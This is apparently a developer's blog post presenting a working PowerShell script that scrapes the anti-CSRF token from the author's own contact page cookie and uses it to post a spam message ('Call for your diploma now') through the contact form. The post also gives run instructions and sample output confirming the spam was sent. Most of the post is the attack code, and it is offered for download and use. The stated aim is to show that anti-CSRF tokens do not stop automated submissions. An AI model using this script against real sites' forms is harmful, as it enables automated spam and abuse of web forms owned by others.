Hacking Anti Cross-site Request Forgery Tokens (CSRF) With Powershell
I ported the example of how to hack an Anti CRSF Token protected form - previously shown in my post What Are Anti Cross-site Request Forgery Tokens And What Are They Good For? - to PowerShell.
How to hack an Anti CRSF Token from PowerShell
-
function global:spam-adamdotcom(){
-
-
# Load the assembly containing WebClientWithCookies and RegexUtilities
-
[Reflection.Assembly]::LoadFile((Resolve-Path "AdamDotCom.WebClientWithCookies.dll")) | out-null
-
-
# Load the assembly containing System.Web.HttpUtilitiy
-
[void][Reflection.Assembly]::LoadWithPartialName("System.Web") | out-null
-
-
# create a new instance of the HTTP Web Client that supports cookies
-
$webClient = New-Object AdamDotCom.Common.Service.Utilities.WebClientWithCookies
-
-
# download the page that contains the Anti CRSF Token
-
[void] $webClient.DownloadData("http://adam.kahtava.com/contact");
-
-
# use a regular expression to grab the Anti CRSF Token
-
# - this is an MVC site so we're looking for a token named "__RequestVerificationToken_Lw__"
-
$regex = "__RequestVerificationToken_Lw__=(?<CRSF_Token>[^;]+)"
-
$match = [regex]::matches($webClient.ResponseHeaders["Set-Cookie"], $regex)[0]
-
$antiCrsfToken = $match.Groups["CRSF_Token"].Captures[0].Value
-
-
write-host "`nYour Anti CRSF Token is: " $antiCrsfToken
-
-
# construct the message including the Anti CSRF Token
-
$message = "__RequestVerificationToken=" + [System.Web.HttpUtility]::UrlEncode($antiCrsfToken) +
-
"&fromName=Johnathon Fink" +
-
"&fromAddress=prancesw@rmcres.com" +
-
"&subject=Call for your diploma now" +
-
"&body=Is your lack of a degree..."
-
-
# send spam-spam-spam
-
$webClient.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
-
[void] $webClient.UploadData("http://adam.kahtava.com/contact/send", "POST",
-
([System.Text.Encoding]::UTF8.GetBytes($message)));
-
-
write-host "`nSuccess!!! Your spam has been sent.`n"
-
}
To run this script:
- Download the script
- Run PowerShell
- Load the script:
.\Automated-AntiCSRF-Authentication-Script.ps1
- Start sending spam-spam-spam:
PS > spam-adamdotcom
Here's the output as seen on my machine:
-
PS C:\> .\Automated-AntiCSRF-Authentication-Script.ps1
-
PS C:\> spam-adamdotcom
-
-
Your Anti CRSF Token is: f54ZlHS3L1Xyl65dYd1uYYh90ygNKYmCswXJUnr0GYtgcrJdJILsQ2jyFotzc10L
-
-
Success!!! Your spam has been sent.
This example uses a derivation of the .NET Framework's Web Client class but with Cookies enabled, so it depends on the AdamDotCom.Common.Service.dll assembly (browse the source here). This dependency can be automatically resolved by issuing the download-client
function that's also found within the PowerShell script.
Contribute, view, or download the openly available script here: Automated-AntiCSRF-Authentication-Script.ps1